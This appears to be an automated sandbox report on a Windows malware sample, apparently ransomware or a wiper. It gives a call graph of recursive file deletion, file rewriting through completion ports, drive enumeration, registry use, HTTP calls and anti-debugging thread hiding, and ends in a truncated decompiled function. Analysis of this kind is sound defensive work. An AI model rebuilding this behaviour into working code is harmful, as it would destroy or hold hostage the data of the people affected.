10f153e GetPEB 5749->5750 5751 10fc8ed 5750->5751 6036 10f5f98 GetPEB RtlAllocateHeap 5751->6036 5753 10fc8fa 5767 10fc903 5753->5767 6037 10fc43b CoInitialize 5753->6037 5755 10fcc02 5758 10fcc10 5755->5758 6051 10f5fb3 GetPEB RtlFreeHeap 5755->6051 5761 10fcc1e 5758->5761 6052 10f5fb3 GetPEB RtlFreeHeap 5758->6052 5761->5507 5762 10fc92e 5762->5767 6045 10f5f98 GetPEB RtlAllocateHeap 5762->6045 5765 10fc1b4 NtSetInformationThread 5770 10fc949 5765->5770 5767->5755 6050 10f5fb3 GetPEB RtlFreeHeap 5767->6050 5768 10f5fb3 GetPEB RtlFreeHeap 5768->5770 5769 10fc2e9 NtSetInformationThread 5769->5770 5770->5765 5770->5767 5770->5768 5770->5769 5771 10f8766 NtSetInformationThread 5770->5771 6046 10f60df 5770->6046 5771->5770 6057 10fa502 5772->6057 5775 10fb1dd 5777 10fb1eb 5775->5777 6098 10f5fb3 GetPEB RtlFreeHeap 5775->6098 5779 10fb1f9 5777->5779 6096 10f5fb3 GetPEB RtlFreeHeap 5777->6096 5779->5510 5780 10f64cc 2 API calls 5783 10fb102 5780->5783 5782 10fb0ac 5782->5775 6097 10f5fb3 GetPEB RtlFreeHeap 5782->6097 5783->5782 6062 10f5f98 GetPEB RtlAllocateHeap 5783->6062 5785 10fb138 5785->5782 6063 10fa5fb 5785->6063 5788 10f64cc 2 API calls 5787->5788 5790 10fdd9f 5788->5790 5789 10fde6b 5792 10fde79 5789->5792 6127 10f5fb3 GetPEB RtlFreeHeap 5789->6127 5801 10fdda8 5790->5801 6122 10fdcf6 5790->6122 5795 10fde87 5792->5795 6128 10f5fb3 GetPEB RtlFreeHeap 5792->6128 5802 10fdb69 5795->5802 5797 10fdddc 5797->5801 6125 10f1647 GetPEB 5797->6125 5799 10fddec 5800 10f6035 2 API calls 5799->5800 5800->5801 5801->5789 6126 10f5fb3 GetPEB RtlFreeHeap 5801->6126 5803 10fdb81 5802->5803 5804 10f155e GetPEB 5803->5804 5805 10fdb86 5804->5805 5806 10f64cc 2 API calls 5805->5806 5807 10fdbbb 5806->5807 5808 10fdbc4 5807->5808 6130 10f5fb3 GetPEB RtlFreeHeap 5807->6130 5808->5516 5811 10f5ffa 5810->5811 5814 10f5f98 GetPEB RtlAllocateHeap 5811->5814 5813 10f600c 5813->5678 5814->5813 5815->5683 5824 10f6ae4 5816->5824 5818 10f6ad5 5818->5686 5819 10f6a29 5819->5818 5820 10f6a5b FindFirstFileExW 5819->5820 5820->5818 5822 10f6a83 5820->5822 5821 10f6ac1 FindNextFileW 5821->5818 5821->5822 5822->5821 5830 10f6bbf 5822->5830 5825 10f6b04 FindFirstFileExW 5824->5825 5827 10f6bb6 5825->5827 5829 10f6b62 FindClose 5825->5829 5827->5819 5829->5827 5831 10f6be1 5830->5831 5832 10f6d76 5831->5832 5849 10f5f98 GetPEB RtlAllocateHeap 5831->5849 5832->5821 5834 10f6d5a 5835 10f6d68 5834->5835 5853 10f5fb3 GetPEB RtlFreeHeap 5834->5853 5835->5832 5854 10f5fb3 GetPEB RtlFreeHeap 5835->5854 5838 10f6bf9 5838->5834 5839 10f6c31 FindFirstFileExW 5838->5839 5839->5834 5848 10f6c59 5839->5848 5840 10f6d39 FindNextFileW 5841 10f6d51 FindClose 5840->5841 5840->5848 5841->5834 5843 10f6cd3 GetFileAttributesW 5844 10f6d21 DeleteFileW 5843->5844 5843->5848 5851 10f5fb3 GetPEB RtlFreeHeap 5844->5851 5846 10f6bbf 4 API calls 5846->5848 5848->5840 5848->5843 5848->5846 5850 10f5f98 GetPEB RtlAllocateHeap 5848->5850 5852 10f5fb3 GetPEB RtlFreeHeap 5848->5852 5849->5838 5850->5848 5851->5848 5852->5848 5853->5835 5854->5832 5855->5696 5856->5693 5857->5699 5858->5699 5859->5704 5860->5706 5862 10f154a 5861->5862 5863 10f8bc9 CreateThread 5862->5863 5864 10f8c09 5863->5864 5865 10f8c65 5863->5865 5885 10f8bb4 GetLogicalDriveStringsW 5863->5885 5866 10f8c3b ResumeThread 5864->5866 5867 10f8766 NtSetInformationThread 5864->5867 5865->5728 5869 10f8c4f GetExitCodeThread 5866->5869 5868 10f8c1a 5867->5868 5868->5866 5870 10f8c1e 5868->5870 5869->5865 5870->5728 5871->5731 5872->5740 5873->5743 5875 10f899a 5874->5875 5876 10f893e 5874->5876 5886 10f88fb GetDriveTypeW 5874->5886 5875->5743 5877 10f8970 ResumeThread 5876->5877 5878 10f8766 NtSetInformationThread 5876->5878 5879 10f8984 GetExitCodeThread NtClose 5877->5879 5880 10f894f 5878->5880 5879->5875 5880->5877 5881 10f8953 5880->5881 5881->5743 5882->5730 5883->5733 5884->5736 5888 10fbf96 SetThreadPriority 5887->5888 5894 10fbf4c 5887->5894 5890 10f155e GetPEB 5888->5890 5891 10fbfaa 5890->5891 5913 10f5f98 GetPEB RtlAllocateHeap 5891->5913 5892 10fbf88 5967 10f5fb3 GetPEB RtlFreeHeap 5892->5967 5894->5892 5897 10f9a57 12 API calls 5894->5897 5895 10fbf90 5898 10fbf7a 5897->5898 5899 10fbc06 16 API calls 5898->5899 5899->5892 5903 10fbff9 FindFirstFileExW 5911 10fbfc9 5903->5911 5905 10fc167 5966 10f5fb3 GetPEB RtlFreeHeap 5905->5966 5906 10fc12f FindNextFileW 5908 10fc147 FindClose 5906->5908 5906->5911 5908->5911 5909 10fc18a 5910 10fbdf8 GetPEB RtlAllocateHeap 5910->5911 5911->5905 5911->5906 5911->5910 5914 10f9a57 5911->5914 5933 10fbd96 5911->5933 5937 10f5fb3 GetPEB RtlFreeHeap 5911->5937 5938 10fbc06 5911->5938 5965 10f5fb3 GetPEB RtlFreeHeap 5911->5965 5913->5911 5915 10f9a6c 5914->5915 5916 10f9a67 5914->5916 5917 10f6035 2 API calls 5915->5917 5916->5911 5918 10f9a76 5917->5918 5918->5916 5919 10f9a84 GetFileAttributesW 5918->5919 5920 10f9a94 5919->5920 5921 10f9aeb 5920->5921 5922 10f9ad9 5920->5922 5924 10f9af3 5921->5924 5925 10f9b02 GetFileAttributesW 5921->5925 5923 10f9b34 5 API calls 5922->5923 5928 10f9ae1 5923->5928 5968 10f9b34 CreateFileW 5924->5968 5926 10f9b0f 5925->5926 5927 10f9b18 CopyFileW 5925->5927 5977 10f5fb3 GetPEB RtlFreeHeap 5926->5977 5975 10f5fb3 GetPEB RtlFreeHeap 5927->5975 5976 10f5fb3 GetPEB RtlFreeHeap 5928->5976 5934 10fbdae 5933->5934 5935 10fbdc4 5934->5935 5978 10f5f98 GetPEB RtlAllocateHeap 5934->5978 5935->5911 5937->5903 5939 10fbc29 5938->5939 5940 10fbd88 5938->5940 5979 10fb9b6 5939->5979 5940->5911 5943 10fbd80 6010 10f5fb3 GetPEB RtlFreeHeap 5943->6010 5947 10f6035 2 API calls 5950 10fbc53 5947->5950 5948 10fbc72 MoveFileExW 5949 10fbcbe CreateFileW 5948->5949 5948->5950 5951 10fbce7 5949->5951 5963 10fbcb0 5949->5963 5950->5943 5950->5948 5950->5963 6000 10f5fb3 GetPEB RtlFreeHeap 5950->6000 6001 10fb8ae 5950->6001 5992 10fbb23 5951->5992 5957 10fbd09 CreateIoCompletionPort 5959 10fbd31 5957->5959 5960 10fbd20 5957->5960 5958 10fbcf8 6006 10f5fb3 GetPEB RtlFreeHeap 5958->6006 5959->5963 6008 10f5fb3 GetPEB RtlFreeHeap 5959->6008 6007 10f5fb3 GetPEB RtlFreeHeap 5960->6007 6009 10f5fb3 GetPEB RtlFreeHeap 5963->6009 5965->5911 5966->5909 5967->5895 5970 10f9bb0 5968->5970 5973 10f9b6c 5968->5973 5969 10f9b8f WriteFile 5969->5970 5969->5973 5970->5916 5971 10f9bbf WriteFile 5971->5970 5971->5973 5972 10f9be7 WriteFile 5972->5970 5972->5973 5973->5969 5973->5970 5973->5971 5973->5972 5974 10f9c12 WriteFile 5973->5974 5974->5970 5974->5973 5975->5916 5976->5916 5977->5924 5978->5935 5980 10fb9cf SetFileAttributesW CreateFileW 5979->5980 5982 10fb9fd 5980->5982 5983 10fba15 5980->5983 5982->5980 5982->5983 6011 10fb46a 5982->6011 5983->5943 5984 10fba64 SetFileAttributesW CreateFileW 5983->5984 5985 10fbb10 5984->5985 5986 10fbaa4 SetFilePointerEx 5984->5986 5985->5943 5985->5947 5986->5985 5987 10fbac3 ReadFile 5986->5987 5987->5985 5988 10fbae2 5987->5988 6027 10fb84a 5988->6027 5990 10fbaf3 5990->5985 6031 10f5fb3 GetPEB RtlFreeHeap 5990->6031 5993 10fbb38 5992->5993 6033 10f5f98 GetPEB RtlAllocateHeap 5993->6033 5995 10fbbfb 5995->5957 5995->5958 5996 10fbb57 5996->5995 5997 10fb84a 2 API calls 5996->5997 5998 10fbbea 5997->5998 5998->5995 6034 10f5fb3 GetPEB RtlFreeHeap 5998->6034 6000->5950 6005 10fb8e2 6001->6005 6003 10f6035 2 API calls 6003->6005 6004 10fb926 6004->5950 6005->6003 6005->6004 6035 10f5fb3 GetPEB RtlFreeHeap 6005->6035 6006->5963 6007->5963 6008->5963 6009->5943 6010->5940 6012 10f155e GetPEB 6011->6012 6013 10fb475 6012->6013 6014 10fb482 6013->6014 6016 10fb319 6013->6016 6014->5982 6018 10fb344 6016->6018 6017 10fb45f 6017->6014 6023 10fb3c6 6018->6023 6024 10f5f98 GetPEB RtlAllocateHeap 6018->6024 6021 10fb39d 6021->6023 6025 10f5fce GetPEB RtlReAllocateHeap 6021->6025 6023->6017 6026 10f5fb3 GetPEB RtlFreeHeap 6023->6026 6024->6021 6025->6021 6026->6017 6028 10fb85a 6027->6028 6030 10fb867 6027->6030 6028->6030 6032 10f5f98 GetPEB RtlAllocateHeap 6028->6032 6030->5990 6031->5985 6032->6030 6033->5996 6034->5995 6035->6005 6036->5753 6039 10fc475 6037->6039 6041 10fc62a 6037->6041 6039->6041 6042 10fc4f9 6039->6042 6053 10f5f98 GetPEB RtlAllocateHeap 6039->6053 6054 10f5fb3 GetPEB RtlFreeHeap 6039->6054 6041->5767 6044 10f5f98 GetPEB RtlAllocateHeap 6041->6044 6042->6041 6042->6042 6055 10f5f98 GetPEB RtlAllocateHeap 6042->6055 6044->5762 6045->5770 6047 10f60f8 6046->6047 6056 10f5f98 GetPEB RtlAllocateHeap 6047->6056 6049 10f6118 6049->5770 6050->5755 6051->5758 6052->5761 6053->6039 6054->6039 6055->6042 6056->6049 6058 10f6245 3 API calls 6057->6058 6059 10fa51e 6058->6059 6061 10fa5ac 6059->6061 6099 10f5f98 GetPEB RtlAllocateHeap 6059->6099 6061->5780 6061->5782 6062->5785 6064 10fa64e 6063->6064 6065 10fa653 6063->6065 6066 10faa96 6064->6066 6114 10f5fb3 GetPEB RtlFreeHeap 6064->6114 6065->6064 6100 10f5f98 GetPEB RtlAllocateHeap 6065->6100 6069 10faaa4 6066->6069 6115 10f5fb3 GetPEB RtlFreeHeap 6066->6115 6071 10faab2 6069->6071 6116 10f5fb3 GetPEB RtlFreeHeap 6069->6116 6072 10faac0 6071->6072 6117 10f5fb3 GetPEB RtlFreeHeap 6071->6117 6075 10faace 6072->6075 6118 10f5fb3 GetPEB RtlFreeHeap 6072->6118 6079 10faadc 6075->6079 6119 10f5fb3 GetPEB RtlFreeHeap 6075->6119 6076 10fa694 6076->6064 6101 10facc5 6076->6101 6079->5782 6080 10fa6bd 6080->6064 6105 10faae7 6080->6105 6083 10fa6d0 6083->6064 6109 10fac81 6083->6109 6086 10f64cc 2 API calls 6087 10fa6fb 6086->6087 6087->6064 6088 10fa709 InternetOpenW 6087->6088 6088->6064 6093 10fa728 6088->6093 6089 10fa81e InternetConnectW 6089->6093 6090 10faa23 InternetCloseHandle 6090->6093 6091 10fa904 HttpSendRequestW 6091->6093 6092 10fa99c InternetQueryDataAvailable 6092->6093 6093->6064 6093->6089 6093->6090 6093->6091 6093->6092 6095 10f5fb3 GetPEB RtlFreeHeap 6093->6095 6113 10f5f98 GetPEB RtlAllocateHeap 6093->6113 6095->6093 6096->5779 6097->5775 6098->5777 6099->6061 6100->6076 6102 10faced 6101->6102 6120 10f5f98 GetPEB RtlAllocateHeap 6102->6120 6104 10fae08 6104->6080 6106 10fab74 6105->6106 6121 10f5f98 GetPEB RtlAllocateHeap 6106->6121 6108 10fabc7 6108->6083 6110 10faca0 6109->6110 6111 10f64cc 2 API calls 6110->6111 6112 10fa6e3 6111->6112 6112->6064 6112->6086 6113->6093 6114->6066 6115->6069 6116->6071 6117->6072 6118->6075 6119->6079 6120->6104 6121->6108 6129 10f5f98 GetPEB RtlAllocateHeap 6122->6129 6124 10fdd0c 6124->5797 6125->5799 6126->5789 6127->5792 6128->5795 6129->6124 6130->5808 6150 10fa32a 6131->6150 6134 10faf23 6136 10fb037 6134->6136 6186 10f5fb3 GetPEB RtlFreeHeap 6134->6186 6135 10fa502 5 API calls 6142 10faf2d 6135->6142 6138 10fb045 6136->6138 6187 10f5fb3 GetPEB RtlFreeHeap 6136->6187 6140 10fb053 6138->6140 6188 10f5fb3 GetPEB RtlFreeHeap 6138->6188 6141 10fb061 6140->6141 6189 10f5fb3 GetPEB RtlFreeHeap 6140->6189 6142->6134 6145 10f64cc 2 API calls 6142->6145 6146 10faf8c 6145->6146 6146->6134 6185 10f5f98 GetPEB RtlAllocateHeap 6146->6185 6148 10fafdf 6148->6134 6149 10fa5fb 9 API calls 6148->6149 6149->6134 6151 10f64cc 2 API calls 6150->6151 6152 10fa37c 6151->6152 6184 10fa385 6152->6184 6190 10f9c58 6152->6190 6155 10fa496 6156 10fa4a4 6155->6156 6256 10f5fb3 GetPEB RtlFreeHeap 6155->6256 6160 10fa4b2 6156->6160 6257 10f5fb3 GetPEB RtlFreeHeap 6156->6257 6163 10fa4c0 6160->6163 6258 10f5fb3 GetPEB RtlFreeHeap 6160->6258 6166 10fa4ce 6163->6166 6259 10f5fb3 GetPEB RtlFreeHeap 6163->6259 6172 10fa4dc 6166->6172 6260 10f5fb3 GetPEB RtlFreeHeap 6166->6260 6171 10fa4ea 6174 10fa4f8 6171->6174 6262 10f5fb3 GetPEB RtlFreeHeap 6171->6262 6172->6171 6261 10f5fb3 GetPEB RtlFreeHeap 6172->6261 6174->6134 6174->6135 6175 10fa3a7 6242 10fa134 6175->6242 6180 10fa3bf 6253 10f5f98 GetPEB RtlAllocateHeap 6180->6253 6182 10fa43f 6182->6184 6254 10f5fce GetPEB RtlReAllocateHeap 6182->6254 6184->6155 6255 10f5fb3 GetPEB RtlFreeHeap 6184->6255 6185->6148 6186->6136 6187->6138 6188->6140 6189->6141 6191 10f8bc9 5 API calls 6190->6191 6192 10f9c8c 6191->6192 6193 10f9c92 6192->6193 6263 10f5f98 GetPEB RtlAllocateHeap 6192->6263 6196 10f9e32 6193->6196 6275 10f5fb3 GetPEB RtlFreeHeap 6193->6275 6195 10f9ca4 6195->6193 6200 10f8bc9 5 API calls 6195->6200 6198 10f9e40 6196->6198 6276 10f5fb3 GetPEB RtlFreeHeap 6196->6276 6199 10f9e4e 6198->6199 6277 10f5fb3 GetPEB RtlFreeHeap 6198->6277 6216 10f9e58 6199->6216 6203 10f9cc1 6200->6203 6203->6193 6204 10f64cc 2 API calls 6203->6204 6205 10f9cd6 6204->6205 6205->6193 6206 10f64cc 2 API calls 6205->6206 6207 10f9cee 6206->6207 6207->6193 6264 10f5f98 GetPEB RtlAllocateHeap 6207->6264 6209 10f9d1f 6209->6193 6265 10f5f98 GetPEB RtlAllocateHeap 6209->6265 6211 10f890b 6 API calls 6214 10f9d48 6211->6214 6213 10f9dff 6274 10f5fce GetPEB RtlReAllocateHeap 6213->6274 6214->6193 6214->6211 6214->6213 6266 10f8c89 CreateThread 6214->6266 6279 10f8856 CreateThread 6216->6279 6218 10f9e7d 6287 10f5f98 GetPEB RtlAllocateHeap 6218->6287 6220 10f9e8d 6221 10f9eb4 6220->6221 6222 10f8856 5 API calls 6220->6222 6225 10f9ec2 6221->6225 6223 10f9ea8 6222->6223 6223->6221 6288 10f5fb3 GetPEB RtlFreeHeap 6223->6288 6226 10f9ee3 6225->6226 6290 10f5f98 GetPEB RtlAllocateHeap 6226->6290 6228 10f9f15 6231 10f9f23 6228->6231 6229 10f9ef3 6229->6228 6291 10f5fb3 GetPEB RtlFreeHeap 6229->6291 6292 10f6393 6231->6292 6233 10fa109 6233->6175 6234 10fa100 NtClose 6234->6233 6235 10f9f4c 6236 10f9fe7 RegCreateKeyExW 6235->6236 6241 10f9f50 6235->6241 6237 10fa018 RegQueryValueExW 6236->6237 6236->6241 6239 10fa082 6237->6239 6239->6239 6239->6241 6298 10f5f98 GetPEB RtlAllocateHeap 6239->6298 6241->6233 6241->6234 6243 10fa1ec 6242->6243 6243->6243 6244 10fa1f8 RegCreateKeyExW 6243->6244 6245 10fa2ae 6244->6245 6246 10fa222 RegQueryValueExW 6244->6246 6250 10fa2da 6245->6250 6246->6245 6248 10fa2a6 6246->6248 6300 10f5f98 GetPEB RtlAllocateHeap 6248->6300 6301 10f5f98 GetPEB RtlAllocateHeap 6250->6301 6252 10fa2ec 6252->6180 6253->6182 6254->6184 6255->6155 6256->6156 6257->6160 6258->6163 6259->6166 6260->6172 6261->6171 6262->6174 6263->6195 6264->6209 6265->6214 6267 10f8cd5 6266->6267 6268 10f8d31 6266->6268 6278 10f8c6e GetDiskFreeSpaceExW 6266->6278 6269 10f8d07 ResumeThread 6267->6269 6270 10f8766 NtSetInformationThread 6267->6270 6268->6214 6272 10f8d1b GetExitCodeThread 6269->6272 6271 10f8ce6 6270->6271 6271->6269 6273 10f8cea 6271->6273 6272->6268 6273->6214 6274->6193 6275->6196 6276->6198 6277->6199 6280 10f8896 6279->6280 6281 10f88f2 6279->6281 6289 10f8841 GetUserNameW 6279->6289 6282 10f88c8 ResumeThread 6280->6282 6283 10f8766 NtSetInformationThread 6280->6283 6281->6218 6284 10f88dc GetExitCodeThread 6282->6284 6285 10f88a7 6283->6285 6284->6281 6285->6282 6286 10f88ab 6285->6286 6286->6218 6287->6220 6288->6221 6290->6229 6291->6228 6293 10f63cd NtQueryInformationToken 6292->6293 6294 10f63b6 6292->6294 6295 10f63c8 6293->6295 6294->6293 6294->6295 6296 10f641f 6295->6296 6299 10f5fb3 GetPEB RtlFreeHeap 6295->6299 6296->6235 6298->6241 6299->6296 6300->6245 6301->6252 6351 10fc1b4 6302->6351 6305 10fcccf 6309 10f153e GetPEB 6305->6309 6325 10fccf8 6305->6325 6306 10fc1b4 NtSetInformationThread 6308 10fcca7 6306->6308 6307 10fcf2a 6311 10fcf38 6307->6311 6359 10f5fb3 GetPEB RtlFreeHeap 6307->6359 6308->6305 6314 10fc1b4 NtSetInformationThread 6308->6314 6312 10fccdc 6309->6312 6315 10fcf46 6311->6315 6360 10f5fb3 GetPEB RtlFreeHeap 6311->6360 6355 10f5f98 GetPEB RtlAllocateHeap 6312->6355 6314->6305 6315->5186 6318 10fccef 6318->6325 6356 10f5f98 GetPEB RtlAllocateHeap 6318->6356 6320 10fcd0a 6321 10fb790 10 API calls 6320->6321 6320->6325 6329 10fcd1d 6321->6329 6322 10f60df 2 API calls 6322->6329 6323 10fceaa 6323->6325 6357 10f5fb3 GetPEB RtlFreeHeap 6323->6357 6325->6307 6358 10f5fb3 GetPEB RtlFreeHeap 6325->6358 6326 10fc2e9 NtSetInformationThread 6326->6329 6327 10f8766 NtSetInformationThread 6327->6329 6328 10f5fb3 GetPEB RtlFreeHeap 6328->6329 6329->6322 6329->6323 6329->6326 6329->6327 6329->6328 6331 10f6035 2 API calls 6330->6331 6332 10f699d 6331->6332 6333 10f69c0 6332->6333 6361 10f5fb3 GetPEB RtlFreeHeap 6332->6361 6333->5528 6335->5539 6336->5539 6337->5539 6339 10f9041 6338->6339 6339->6339 6340 10f8bc9 5 API calls 6339->6340 6341 10f9064 6340->6341 6342 10f9093 6341->6342 6362 10f5f98 GetPEB RtlAllocateHeap 6341->6362 6342->5528 6344->5539 6345->5539 6346->5539 6347->5567 6348->5539 6349->5539 6350->5564 6352 10fc20e 6351->6352 6353 10f8766 NtSetInformationThread 6352->6353 6354 10fc228 6352->6354 6353->6354 6354->6305 6354->6306 6355->6318 6356->6320 6357->6325 6358->6307 6359->6311 6360->6315 6361->6333 6362->6342 6421 10fd701 6363->6421 6365 10fd900 6366 10f64cc 2 API calls 6365->6366 6391 10fd904 6365->6391 6374 10fd913 6366->6374 6367 10fda9f 6369 10fdaad 6367->6369 6448 10f5fb3 GetPEB RtlFreeHeap 6367->6448 6371 10fdabb 6369->6371 6449 10f5fb3 GetPEB RtlFreeHeap 6369->6449 6373 10fdac9 6371->6373 6450 10f5fb3 GetPEB RtlFreeHeap 6371->6450 6373->5573 6392 10fdc1d 6373->6392 6374->6391 6443 10fdad0 6374->6443 6378 10f64cc 2 API calls 6379 10fd95a 6378->6379 6380 10fdad0 2 API calls 6379->6380 6379->6391 6381 10fd993 6380->6381 6382 10f64cc 2 API calls 6381->6382 6383 10fd99d 6382->6383 6384 10fdad0 2 API calls 6383->6384 6383->6391 6385 10fd9e0 6384->6385 6386 10f64cc 2 API calls 6385->6386 6387 10fd9ea 6386->6387 6388 10fdad0 2 API calls 6387->6388 6387->6391 6389 10fda2a 6388->6389 6390 10f64cc 2 API calls 6389->6390 6390->6391 6391->6367 6447 10f5fb3 GetPEB RtlFreeHeap 6391->6447 6393 10f64cc 2 API calls 6392->6393 6398 10fdc4a 6393->6398 6394 10fdc53 6395 10fdcd1 6394->6395 6460 10f5fb3 GetPEB RtlFreeHeap 6394->6460 6396 10fdcdf 6395->6396 6461 10f5fb3 GetPEB RtlFreeHeap 6395->6461 6396->5573 6403 10fd34b 6396->6403 6398->6394 6399 10fdcf6 2 API calls 6398->6399 6401 10fdc81 6399->6401 6401->6394 6459 10f1647 GetPEB 6401->6459 6404 10fd38f 6403->6404 6405 10fd4b3 RegCreateKeyExW 6404->6405 6409 10fd3f1 6404->6409 6406 10fd4e0 RegQueryValueExW 6405->6406 6405->6409 6407 10fd50f 6406->6407 6408 10fd55b RegDeleteKeyExW 6407->6408 6407->6409 6408->6409 6410 10fd634 6409->6410 6411 10f155e GetPEB 6410->6411 6412 10fd654 6411->6412 6413 10f64cc 2 API calls 6412->6413 6420 10fd659 6412->6420 6418 10fd665 6413->6418 6415 10fd6eb 6415->5582 6416 10fd6dd 6416->6415 6463 10f5fb3 GetPEB RtlFreeHeap 6416->6463 6419 10f64cc 2 API calls 6418->6419 6418->6420 6419->6420 6420->6416 6462 10f5fb3 GetPEB RtlFreeHeap 6420->6462 6422 10fd730 6421->6422 6424 10fd743 6421->6424 6423 10f64cc 2 API calls 6422->6423 6422->6424 6425 10fd74e 6423->6425 6435 10fd7d0 6424->6435 6451 10fd591 6424->6451 6425->6424 6426 10f64cc 2 API calls 6425->6426 6428 10fd766 6426->6428 6428->6424 6429 10fd775 6428->6429 6431 10f64cc 2 API calls 6429->6431 6430 10fd7f7 6432 10f6035 2 API calls 6430->6432 6434 10fd77e 6431->6434 6433 10fd806 6432->6433 6433->6435 6436 10f6035 2 API calls 6433->6436 6434->6365 6435->6365 6438 10fd838 6436->6438 6437 10fd87e 6440 10fd88c 6437->6440 6455 10f5fb3 GetPEB RtlFreeHeap 6437->6455 6438->6435 6438->6437 6454 10f5fb3 GetPEB RtlFreeHeap 6438->6454 6440->6435 6456 10f5fb3 GetPEB RtlFreeHeap 6440->6456 6444 10fdad6 6443->6444 6445 10fd950 6443->6445 6458 10f5fb3 GetPEB RtlFreeHeap 6444->6458 6445->6378 6447->6367 6448->6369 6449->6371 6450->6373 6457 10f5f98 GetPEB RtlAllocateHeap 6451->6457 6453 10fd5a7 6453->6430 6454->6437 6455->6440 6456->6435 6457->6453 6458->6445 6459->6394 6460->6395 6461->6396 6462->6416 6463->6415 6474 10f5f98 GetPEB RtlAllocateHeap 6464->6474 6466 10fdf27 6467 10fdf5d 6466->6467 6471 10fdf40 6466->6471 6475 10f5fce GetPEB RtlReAllocateHeap 6466->6475 6476 10f5fb3 GetPEB RtlFreeHeap 6467->6476 6470 10fdf65 6470->5589 6477 10f5fb3 GetPEB RtlFreeHeap 6471->6477 6473 10fdfa0 6473->5589 6474->6466 6475->6466 6476->6470 6477->6473 6478->5600 6479->5592 6480->5593 6481->5596 6647 10f94ec 6648 10f9535 6647->6648 6649 10f953c RtlAdjustPrivilege 6648->6649 6650 10f953a 6648->6650 6649->6648 6664 10f90e7 6666 10f910a 6664->6666 6665 10f9211 6666->6665 6670 10f5f98 GetPEB RtlAllocateHeap 6666->6670 6668 10f91e5 6668->6665 6671 10f5fb3 GetPEB RtlFreeHeap 6668->6671 6670->6668 6671->6665 6532 10fce3d 6546 10fcd3a 6532->6546 6533 10fceaa 6535 10fceb8 6533->6535 6547 10f5fb3 GetPEB RtlFreeHeap 6533->6547 6537 10fcf2a 6535->6537 6548 10f5fb3 GetPEB RtlFreeHeap 6535->6548 6536 10f60df 2 API calls 6536->6546 6539 10fcf38 6537->6539 6549 10f5fb3 GetPEB RtlFreeHeap 6537->6549 6541 10fcf46 6539->6541 6550 10f5fb3 GetPEB RtlFreeHeap 6539->6550 6543 10fc2e9 NtSetInformationThread 6543->6546 6544 10f5fb3 GetPEB RtlFreeHeap 6544->6546 6545 10f8766 NtSetInformationThread 6545->6546 6546->6533 6546->6536 6546->6543 6546->6544 6546->6545 6547->6535 6548->6537 6549->6539 6550->6541 6693 10fc4fb 6696 10fc4dd 6693->6696 6698 10fc4f9 6696->6698 6700 10f5f98 GetPEB RtlAllocateHeap 6696->6700 6701 10f5fb3 GetPEB RtlFreeHeap 6696->6701 6697 10fc62a 6698->6697 6702 10f5f98 GetPEB RtlAllocateHeap 6698->6702 6700->6696 6701->6696 6702->6698 6551 10fba3a 6554 10fb9fd 6551->6554 6552 10fb9cf SetFileAttributesW CreateFileW 6552->6554 6555 10fba15 6552->6555 6553 10fb46a 7 API calls 6553->6554 6554->6552 6554->6553 6554->6555 6564 10f80b7 6565 10f809f 6564->6565 6566 10f80d2 6565->6566 6572 10f80b5 6565->6572 6573 10f5fce GetPEB RtlReAllocateHeap 6565->6573 6574 10f5fb3 GetPEB RtlFreeHeap 6566->6574 6569 10f81ff 6571 10f80da 6575 10f5fb3 GetPEB RtlFreeHeap 6572->6575 6573->6565 6574->6571 6575->6569 6576 10fbcb7 6577 10fbcbe CreateFileW 6576->6577 6578 10fbce7 6577->6578 6591 10fbce2 6577->6591 6579 10fbb23 4 API calls 6578->6579 6581 10fbcf2 6579->6581 6583 10fbd09 CreateIoCompletionPort 6581->6583 6584 10fbcf8 6581->6584 6582 10fbd80 6597 10f5fb3 GetPEB RtlFreeHeap 6582->6597 6585 10fbd31 6583->6585 6586 10fbd20 6583->6586 6593 10f5fb3 GetPEB RtlFreeHeap 6584->6593 6585->6591 6595 10f5fb3 GetPEB RtlFreeHeap 6585->6595 6594 10f5fb3 GetPEB RtlFreeHeap 6586->6594 6590 10fbd88 6596 10f5fb3 GetPEB RtlFreeHeap 6591->6596 6593->6591 6594->6591 6595->6591 6596->6582 6597->6590 6724 10f73f3 6729 10f73f5 6724->6729 6725 10f73db NtQuerySystemInformation 6725->6729 6733 10f73f1 6725->6733 6726 10f740e 6735 10f5fb3 GetPEB RtlFreeHeap 6726->6735 6729->6725 6729->6726 6729->6733 6734 10f5fce GetPEB RtlReAllocateHeap 6729->6734 6731 10f7416 6732 10f74a9 6736 10f5fb3 GetPEB RtlFreeHeap 6733->6736 6734->6729 6735->6731 6736->6732 6737 10fb3f3 6738 10fb3aa 6737->6738 6742 10fb3c6 6738->6742 6743 10f5fce GetPEB RtlReAllocateHeap 6738->6743 6739 10fb45f 6742->6739 6744 10f5fb3 GetPEB RtlFreeHeap 6742->6744 6743->6738 6744->6739 6603 10fb5b1 6609 10fb4ac 6603->6609 6604 10fb4ff 6605 10fb50e ReadFile 6605->6609 6606 10fb679 WriteFile 6606->6609 6607 10fb600 WriteFile 6607->6609 6609->6604 6609->6605 6609->6606 6609->6607 6610 10f5fb3 GetPEB RtlFreeHeap 6609->6610 6610->6609

                Executed Functions

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 131 10f6bbf-10f6be6 133 10f6bec-10f6c00 call 10f5f98 131->133 134 10f6d76-10f6d7b 131->134 137 10f6d5a-10f6d5e 133->137 138 10f6c06-10f6c53 call 10f16b4 FindFirstFileExW 133->138 139 10f6d68-10f6d6c 137->139 140 10f6d60-10f6d63 call 10f5fb3 137->140 138->137 148 10f6c59-10f6c62 138->148 139->134 142 10f6d6e-10f6d71 call 10f5fb3 139->142 140->139 142->134 149 10f6d39-10f6d4b FindNextFileW 148->149 150 10f6c68-10f6c6e 148->150 149->148 151 10f6d51-10f6d54 FindClose 149->151 150->149 152 10f6c74-10f6ca2 call 10f5f98 150->152 151->137 152->149 157 10f6ca8-10f6ce4 GetFileAttributesW 152->157 161 10f6ce6-10f6cf1 157->161 162 10f6d21-10f6d2d DeleteFileW call 10f5fb3 157->162 166 10f6cf5-10f6d00 161->166 167 10f6cf3 161->167 164 10f6d32 162->164 164->149 169 10f6d0c 166->169 170 10f6d02-10f6d0e call 10f6bbf 166->170 168 10f6d10-10f6d1f call 10f5fb3 167->168 168->149 169->168 170->161
                C-Code - Quality: 46%
                			E010F6BBF(intOrPtr _a4) {
                				void* _v8;
                				char _v12;
                				WCHAR* _v16;
                				WCHAR* _v20;
                				struct _WIN32_FIND_DATAW _v612;
                				int _t45;
                				int _t54;
                				void* _t55;
                				void* _t56;
                				void* _t60;
                				signed int _t62;
                				intOrPtr* _t68;
                				void* _t72;
                				void* _t73;
                				void* _t75;
                
                				_v16 = 0;
                				_v20 = 0;
